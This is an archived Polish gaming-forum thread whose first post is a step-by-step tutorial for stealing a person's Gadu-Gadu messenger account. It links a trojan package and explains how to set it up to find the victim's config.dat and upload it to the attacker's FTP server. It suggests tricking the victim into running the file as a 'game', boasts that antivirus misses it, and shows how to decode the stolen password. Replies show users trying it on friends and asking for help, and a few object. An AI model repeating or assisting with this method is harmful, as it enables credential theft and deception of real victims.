Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[TuT] Jak zawinąć komuś konto Gadu Gadu

Rekomendowane odpowiedzi

Opublikowano

Będziemy potrzebowali tych programów :

- FTP-Send

- GG Tools 2.4

- Total Comandera

- Konto ftp np na yoyo.pl

Ściągamy paczkę z programami :

http://rapidshare.com/files/101443883/GG_Hack.rar

Skan : (jeśli dziwisz się że wykryło w paczce trojany to nie martw się , ponieważ tylko trojanem można zdobyć np konto gg)

http://images32.fotosik.pl/188/a2fed0c6569e857d.png

c75953c4d3310d96.png

Następnie odpalamy FTP-Send.exe (uzupełniamy Host do Servera FTP, Nazwa Użytkowanika do FTP, Hasło do FTP) w polu gdzie piszę "Pliki który ma byc wysyłany na ftp" wpisujemy "config.dat" i klikamy OK

Teraz musimy wysłać server naszej ofiaże (np przez gg mówiąc że fajną gre mu prześlesz , albo gdy masz fizyczny dostęp do kompa możesz wgrać to na pendrive powiedzieć kumplowi żeby zrobił Ci herbatę i gdy pójdzie szybko odpalić server) . Gdy to uruchomi , to server przeszuka dyski C i D w poszukiwaniu plików o nazwie "config.dat" a następnie wyśle na nasz server.

33cb14c59b49a666.png

Instalujemy Total Comandera i logujemy się na nasz server. Pojawiły się tam różne nieznane pliki. Aby rozpoznać który potrzebujesz musisz spojrzeć na wielkość pliku , nie może on przekraczać 3/5 KB. Ściągamy w tedy tylko te pliki co mają małą wielkość . Teraz pomyślisz dlaczego jest ich np 4 ? Ponieważ gdy dana osoba ma kilka kont gg to wyszukało nam do wszystkich kont dane. Gdy ściągnęliśmy te pliki zmieniamy ich nazwę na "config.dat" (PPM --> Zmień nazwę)

Teraz żeby odczytać ten plik musimy zainstalować GG Tools 2.4 , gdy to zrobimy uruchamiamy go. Klikamy na Odzyskaj hasła Gadu-Gadu , potem klikamy Otwórz i wskazujemy plik config.dat , na dole pojawiły się Numer i hasło do konta.

Gratulacje zdobyłeś konto swojej ofiary !

Gdy czegoś nie zrozumiesz np ftp , total comander , trojan , server to ja Ci nie pomogę :P

Zapraszam na www.google.pl

ZABRANIAM KOPIOWANIA BEZ MOJEJ ZGODY !

PS

Trojan (ftp sned (serwer) ) jest nie wykrywalny przez większość anty wirusów :)

Opublikowano

cholera zacznie się

a ten trojan jak długo funkcjonuje w ciągu paru dni będzie wykrywalny.

wiecie co mogę napisać [TuTa] jak zrobić takiego trojana ale administracja

proszę adminów o zgodę

Opublikowano

Czy przypadkiem to nie jest forum o hackowaniu GIER a nie LUDZI? To jest zwykła kradzież a nie ułatwienie sobie w grze

Wrzuć.se! - zachęcam do dyskusji na temat mojej stronki do uploadowania obrazków przez ich bezpośrednie wklejanie na stronę!

Opublikowano

Ja bym to odrazu wyjebal a nie przeniosl gdzie indziej...

Wrzuć.se! - zachęcam do dyskusji na temat mojej stronki do uploadowania obrazków przez ich bezpośrednie wklejanie na stronę!

Opublikowano

Widzialem to na 100 innych forach... przetlumaczone tylko dodane screeny... zal i ten podpis zeby nie kopiowac... pfffff

PolandMS

[X]Login Serwer - 100%

[X]World Serwer - 100%

[..]Dropy z potworkow - 48%

[..]Sklepy - 13%

[X]Warp NPC - 100%

PolandMS - Postacie

Job: SuperGM

Level: 255

Nick: [GM]Swirek

Opublikowano
Widzialem to na 100 innych forach... przetlumaczone tylko dodane screeny... zal i ten podpis zeby nie kopiowac... pfffff

Wszystko dziś SAM napisałem , nie wzorując się na innych tematach !

Nie wiem po co kłamiesz , jak taki mądry jesteś to daj linki do tych "100 innych for"

Opublikowano

Topic fajny, szkoda tylko, że nie związany z tematyką forum. Co do swirq:

Zal, widzialem te programy co robisz.... ciekawe gdzie? Hm?

bez gif.

Opublikowano

Spokojnie... ja tylko tak sobie to napisalem... jak ja zrobie jakiegos tutka wszyscy krytykuja a to a tamto

Nie wiem po co kłamiesz , jak taki mądry jesteś to daj linki do tych "100 innych for"

Prawie tak samo napisalem tym ktorzy pisali to do mnie ;P

Co do tutka to spoko tylko ze naprzyklad ja niemam cofing.dat :/

PolandMS

[X]Login Serwer - 100%

[X]World Serwer - 100%

[..]Dropy z potworkow - 48%

[..]Sklepy - 13%

[X]Warp NPC - 100%

PolandMS - Postacie

Job: SuperGM

Level: 255

Nick: [GM]Swirek

Opublikowano

Nie rozumiem co chcesz powiedzieć pisząc " ja niemam cofing.dat "

Jeśli masz gg to musisz włączyć w opcjach folderów pokazywanie ukrytych plików

Gdy to zrobisz wchodzisz w

C:\Documents and Settings\Nazwa Użtkownia\Dane aplikacji\Gadu-Gadu\backup\Ja , i tam masz config.dat

Opublikowano

heh a teraz... moge sie normalnie zalogowac ale pisze

czekamy na serwer

transwer complet

i nie ma zadnych plikow:/ pomoze ktos ? gg:8076274

Opublikowano

nie rozumiem pewnej rzeczy -.- co ten ktos musi otworzyc ? konto ftp, strone czy jakis exe ?

Opublikowano

Mam pytanie, może banalne, bo to nie ja zakładałem u siebie neta więc gdzie są podane FTP hosty itd

??

qrst2113901149h.png

wqdz690429546a.GIFPiszę poprawnie po polsku.

89% graczy uważa że najważniejsza jest grafika jeśli należysz do tych 11% wklej to do podpisu.

Opublikowano

na kazdej stronie gdzie mozna zalozyc swoja strone xD

tj. kazdy hosting stron yoyo.pl lua.pl itp

Opublikowano
nie rozumiem pewnej rzeczy -.- co ten ktos musi otworzyc ? konto ftp, strone czy jakis exe ?

Gdy w tym programie ftp send wpiszesz dane do konta ftp i jaki plik ma wyszukać klikasz OK

A następnie kopiujesz plik o nazwie ftp.exe na pulpit (znajdziesz go w folderze z ftp send) a potem właśnie ten plik wysyłasz komuś

Opublikowano

no to ja wysylalem kolega to ftp.exe bo sprawdzalismy czy to dziala i oni to otwierali wiec potem sie logowalem na total comanderze i nic...pisalo mi

Czeka Na Serwer

262 Transwer Complet

tam na gorze w prawym gornym rogu..:D i nic sie nie robilo...czekalem,czekalem,czekalem i nic .. pomozesz krawy?

Opublikowano
Na ile % to działa prubował to ktos moge zwinąc koledze gg ?

Taak, 834 razy. Bo to w końcu kolega, a od czega ma sie przyjaciół... od podpierdalania kont oczywiście ;)

17yrsqa1utxm_2daf7a3.png

Opublikowano

Lol po co sie bawic w serwery ftp lub total comandery? przeciez kazdym trojanem mozna skopiowac sobie jakis plik od kogos na swoj wlasny komputer, np ten plik config.dat

Opublikowano

prosze o pomoc niewiem jak wlogowac sie do tc

nazwa :asFfsa

nazwa hosta : yoyo.pl

nazwa uzytkownika : arex9639

haslo : ******

i nie powiodlo sie ;/

Opublikowano

ma być chyba to co wpisujesz w nazwa ftp czy jakoś tak w totalu. samo yoyo.pl nie może chyba być

nie powinno być

nazwa hosta : asFfsa.yoyo.pl

?

Mi się udało na luzie xD

o.O
Opublikowano

ehh zrob ktos screena i pokaz jak to ma byc ;p dam 5*

edit

mam tak

sesja:safdhdfh

nazwa hosta : yoyo.pl

uzytkownik :arex9639

haslo :******

i co tu jest żle

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...